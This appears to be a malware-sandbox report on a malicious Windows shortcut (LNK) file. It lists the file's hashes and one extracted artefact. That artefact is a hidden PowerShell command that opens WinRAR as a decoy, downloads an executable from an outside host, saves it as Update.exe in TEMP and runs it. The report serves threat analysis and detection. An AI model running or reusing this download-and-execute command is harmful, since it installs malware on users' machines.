Malicious
Malicious

77f50e7d9326980acdc80cdf02011ef6

LNK File
|
MD5: 77f50e7d9326980acdc80cdf02011ef6
|
Size: 2.56 KB
|
application/x-ms-shortcut


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
77f50e7d9326980acdc80cdf02011ef6
Sha1
57b20d3d4e7360702cba79f54dad40d6763b1af7
Sha256
fb588232c45c3663d8a3fc9f63bc93d49e3dce0fa1af0768123ac77c53acb777
Sha384
61f6c8b8b6b3771400fe37a4ff09d7853080dbd9f0eeb056307de0aca644bd2038f514e746e952bb7640a953b573e0f7
Sha512
865da8e45d0b7b5113674777accf30e5e96665774c3fe771fb7f6afd0a8a40f08fc3091b0ebf00f92cb67018d2ab4fecede09b9cf8a967abab96ef47e0897be6
SSDeep
48:81sJ9SPJETOeR7sx4FkU+n1bdpsx4hdpsx4/7:81G0BEbNg4l+ndg49g4
TLSH
2251BC210BF20318F3B38B3E19FA6310D636FD58DA52CB8E020056894C75121E968F7F
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -NoLogo -WindowStyle Hidden -Command "start "$env:ProgramFiles\WinRAR\WinRAR.exe"; iwr https://l.station307.com/H8xZG3WD4UA7vcpDHfQiLL/Wzqfttpid.exe -OutFile $env:TEMP\Update.exe; start $env:TEMP\Update.exe"

77f50e7d9326980acdc80cdf02011ef6 (2.56 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙